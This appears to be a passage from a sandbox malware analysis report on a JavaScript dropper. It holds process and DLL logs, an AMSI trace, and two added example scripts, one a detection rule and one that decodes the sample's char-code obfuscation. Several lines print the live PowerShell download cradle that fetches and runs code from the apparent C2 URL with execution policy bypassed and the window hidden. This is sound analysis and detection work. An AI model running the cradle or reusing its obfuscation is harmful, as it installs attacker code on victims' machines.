Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msiso.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: n.pdb? source: powershell.exe, 00000002.00000002.1570309617.0000027957BF7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdbstem32\Drivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoota source: powershell.exe, 00000002.00000002.1549666918.000002793D922000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: softy.pdb source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbourcG source: powershell.exe, 00000002.00000002.1569227038.000002795795E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1570309617.0000027957BB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1570309617.0000027957BB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: softy.pdbat source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: icrosoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1569227038.00000279578A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1549666918.000002793D922000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: soft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbu source: powershell.exe, 00000002.00000002.1569227038.000002795795E000.00000004.00000020.00020000.00000000.sdmp
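The process chain recorded above (wscript.exe starting powershell.exe with -noprofile -executionpolicy bypass -WindowStyle hidden and a curl ... |iex download cradle) is the part of this report a detection engineer would turn into a rule. The block below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it evaluates constructed process-creation records, the first of which reproduces the command line the report shows, and scores the individual indicators separately so that abbreviated-switch usage without a script-host parent or a cradle scores lower than the full chain. The function and field names (evaluateProcessEvent, parentImage, image, commandLine) and the two benign records are this example's own.

```javascript
// Added example; not code from the Joe Sandbox report or from the sample.
// A small process-creation rule for the chain documented above:
// wscript.exe -> powershell.exe with -noprofile -executionpolicy bypass
// -WindowStyle hidden and a "curl <url> | iex" download cradle.
// The event records are constructed for this example; the first reproduces the
// command line the report shows wscript.exe passing to powershell.exe.

const EVENTS = [
  {
    parentImage: "C:\\Windows\\System32\\wscript.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine:
      '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noprofile ' +
      '-executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"',
  },
  {
    // constructed: a scheduled maintenance script, no script-host parent
    parentImage: "C:\\Windows\\System32\\svchost.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: "powershell.exe -NoProfile -File C:\\Scripts\\rotate-logs.ps1",
  },
  {
    // constructed: an installer using abbreviated switches, no download cradle
    parentImage: "C:\\Windows\\System32\\cmd.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: "powershell -nop -ep bypass -w hidden -File C:\\Deploy\\install.ps1",
  },
];

const SCRIPT_HOST = /\\(?:wscript|cscript)\.exe$/i;
const POWERSHELL = /\\(?:powershell|pwsh)\.exe$/i;

// powershell.exe accepts any unambiguous prefix of a parameter name, so
// -ep, -exec and -executionpolicy all set the policy, -w and -windowstyle both
// hide the window, and -nop is -noprofile. The patterns match the prefixes
// rather than the full names so abbreviated forms are not missed.
const COMMAND_LINE_CHECKS = [
  ["execution_policy_bypass", /-e(?:x\w*|p)\s+(?:bypass|unrestricted)\b/i],
  ["hidden_window", /-w\w*\s+hidden\b/i],
  ["no_profile", /-nop\w*\b/i],
  // In Windows PowerShell 5.1, curl and wget are aliases of Invoke-WebRequest,
  // which is why "curl <url> | iex" works in the sample's command line;
  // iex is an alias of Invoke-Expression.
  [
    "download_cradle",
    /\b(?:curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b[\s\S]*\b(?:iex|invoke-expression)\b/i,
  ],
];

const URL_PATTERN = /https?:\/\/[^\s"'|<>]+/i;

// Returns the indicators one process-creation event matches, the URL to treat
// as an IOC if one is present, and a coarse severity.
function evaluateProcessEvent(ev) {
  if (!POWERSHELL.test(ev.image)) {
    return { indicators: [], url: null, severity: "none" };
  }
  const indicators = [];
  if (SCRIPT_HOST.test(ev.parentImage)) indicators.push("script_host_spawns_powershell");
  for (const [name, pattern] of COMMAND_LINE_CHECKS) {
    if (pattern.test(ev.commandLine)) indicators.push(name);
  }
  const m = ev.commandLine.match(URL_PATTERN);
  const url = m ? m[0] : null;

  const cradle = indicators.includes("download_cradle");
  let severity = "none";
  if (cradle && indicators.includes("script_host_spawns_powershell")) severity = "high";
  else if (cradle || indicators.length >= 3) severity = "medium";
  else if (indicators.length > 0) severity = "low";
  return { indicators, url, severity };
}

function evaluateAll(events) {
  return events.map(evaluateProcessEvent);
}

for (const result of evaluateAll(EVENTS)) {
  console.log(result.severity.padEnd(6), result.indicators.join(","), result.url || "-");
}
```

The rule is deliberately per-event: the third record (abbreviated switches launched from cmd.exe) stays at medium until it is correlated with a script-host parent or a cradle, while the first record scores high and yields the same C2 URL the report lists under the Run call. Matching parameter prefixes rather than full names is what keeps `-ep bypass -w hidden` from slipping past a rule written only for `-executionpolicy` and `-WindowStyle`.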

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Wscript.Shell%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:146 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:146 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:623 f:KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc");ITextStream.WriteLine(" exec:569 f:KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc");ITextStream.WriteLine(" exit:623 f:KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc r:112%2C111%2C119%2C101%2C114%2C115%2C104%2C101%2C108%2C108%2C32%2C45%2C110%2C111%2C112%2C114%2C111%2C102%2C10");ITextStream.WriteLine(" entry:617 o:%0Afunction%20fromCharCode() f:apply a0:null a1:112%2C111%2C119%2C101%2C114%2C115%2C104%2C101%2C108%2C108%2C32%2C45%2C110%2C111%2C112%2C114%2C111%2C102%2C105%2C108%2C101%2C32%2C45%2C101%2C120%2C101%2C99%2C117%2C1");ITextStream.WriteLine(" exit:617 o:%0Afunction%20fromCharCode() f:apply r:%22powershell%20-noprofile%20-executionpolicy%20bypass%20-WindowStyle%20hidden%20-C%20%22%20curl%20URL%20%7Ciex%22%22");ITextStream.WriteLine(" entry:644 f:sh25wWm2Gmp2");ITextStream.WriteLine(" exec:155 f:sh25wWm2Gmp2");ITextStream.WriteLine(" entry:158 o:%2272%2C84%2C84%2C80%2C26%2C15%2C15%2C78%2C90%2C89%2C19%2C84%2C86%2C66%2C66%2C23%2C18%2C71%2C19%2C14%2C84%2C79%2C80%2C15%2C17%2C14%2C80%2C72%2C80%2C31%2C83%2C29%2C77%2C73%2C78%2C84%2C83%2C17%2C19%22 f:split a0:%2");ITextStream.WriteLine(" exit:158 o:%2272%2C84%2C84%2C80%2C26%2C15%2C15%2C78%2C90%2C89%2C19%2C84%2C86%2C66%2C66%2C23%2C18%2C71%2C19%2C14%2C84%2C79%2C80%2C15%2C17%2C14%2C80%2C72%2C80%2C31%2C83%2C29%2C77%2C73%2C78%2C84%2C83%2C17%2C19%22 f:split 
r:72%2");ITextStream.WriteLine(" exit:644 f:sh25wWm2Gmp2 r:%22http%3A%2F%2Fnzy3tvbb72g3.top%2F1.php%3Fs%3Dmints13%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:611 o: f:Run a0:%22powershell%20-noprofile%20-executionpolicy%20bypass%20-WindowStyle%20hidden%20-C%20%22%20curl%20http%3A%2F%2Fnzy3tvbb72g3.top%2F1.php%3Fs%3Dmints13%20%7Ciex%22%22");IWshShell3.Run("powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9410.js.csv");IHost.Name();ITextStream.WriteLine(" entry:4 o:Windows%20Script%20Host f:Sleep a0:6000");IHost.Sleep("6000");IHost.Name();ITextStream.WriteLine(" exit:4 o:Windows%20Script%20Host f:Sleep r:undefined");ITextStream.WriteLine(" entry:98 f:");ITextStream.WriteLine(" exec:99 f:");ITextStream.WriteLine(" exit:98 f: r:%22Wscript.Shell%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:146 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._000
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1E842E pushad ; ret 2_2_00007FFB4B1E845D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1E7C2E pushad ; retf 2_2_00007FFB4B1E7C5D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1E845E push eax; ret 2_2_00007FFB4B1E846D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1E7C5E push eax; retf 2_2_00007FFB4B1E7C6D
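The AMSI trace above records the two string-building steps that hide the command line and the C2 URL: a `String.fromCharCode.apply(null, ...)` call that yields the PowerShell template with a literal `URL` placeholder ("exit:617 ... r:powershell -noprofile ... curl URL |iex"), and a function that splits a comma-separated list of small integers on "," and returns the URL ("entry:158 ... f:split", "exit:644 ... r:http://nzy3tvbb72g3.top/1.php?s=mints13"). The block below is an added example, not the sample's code and not part of the Joe Sandbox report: it reproduces both steps so the placeholder substitution and the Run argument can be checked. The URL code list is copied verbatim from the trace; the offset of 32 between those values and the URL is inferred from the recorded input/output pair, not stated on the page, so the example brute-forces it rather than hard-coding it. The template code list is truncated in the trace ("...117,1"), so it is rebuilt here from the recorded output; its first values (112,111,119,101 = "powe") confirm it is stored as plain char codes. Function names (decodeCharCodes, findUrlOffset, buildCommandLine) are this example's own.

```javascript
// Added example; not code from the sample or from Joe Sandbox. It reproduces
// the two string-building steps the AMSI trace records:
//  1. the PowerShell command template is built with
//     String.fromCharCode.apply(null, <array of char codes>);
//  2. the C2 URL is stored as a comma-separated list of small integers, split
//     on "," and turned into text. The trace records both the input list and
//     the resulting URL; the fixed offset of 32 between them is inferred here
//     from that pair (the page does not state it).

// Copied verbatim from the trace: the input of the URL step.
const URL_CODES =
  "72,84,84,80,26,15,15,78,90,89,19,84,86,66,66,23,18,71,19,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19";

// The trace truncates the template's code list after "...117,1" but records the
// complete output, so the list is rebuilt from that output. Assumption: the
// template is stored as plain char codes; the recorded prefix
// 112,111,119,101,114,115,104,101,108,108 spells "powershell", which agrees.
const CMD_TEMPLATE =
  'powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex"';
const CMD_TEMPLATE_CODES = Array.from(CMD_TEMPLATE, (ch) => String(ch.charCodeAt(0))).join(",");

// Decode a comma-separated list of integers into a string, adding a fixed
// offset to every value (offset 0 is the plain String.fromCharCode case).
function decodeCharCodes(csv, offset = 0) {
  const codes = csv.split(",").map((n) => Number(n) + offset);
  return String.fromCharCode.apply(null, codes);
}

// The sample hard-codes its offset; an analyst usually does not know it, so
// this tries every offset that keeps the result printable until it parses as
// an http(s) URL. Returns -1 if none does.
function findUrlOffset(csv) {
  for (let offset = 0; offset < 128; offset++) {
    const candidate = decodeCharCodes(csv, offset);
    if (/^https?:\/\/[\x21-\x7e]+$/.test(candidate)) return offset;
  }
  return -1;
}

// Mirrors the order the trace shows: build the template, decode the URL,
// substitute it for the placeholder, and return what goes to WScript.Shell.Run.
function buildCommandLine() {
  const template = decodeCharCodes(CMD_TEMPLATE_CODES);
  const offset = findUrlOffset(URL_CODES);
  if (offset < 0) throw new Error("no offset yields a URL");
  return template.replace("URL", decodeCharCodes(URL_CODES, offset));
}

console.log("offset:", findUrlOffset(URL_CODES));
console.log("command:", buildCommandLine());
```

Run it with node. The recovered string is exactly the argument the trace shows passed to IWshShell3.Run, and the brute-force step is the part worth keeping for the next sample of this family: a changed offset or a reordered template costs nothing to the author but breaks a decoder that hard-codes 32.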

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\fm5vwqhpqe.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
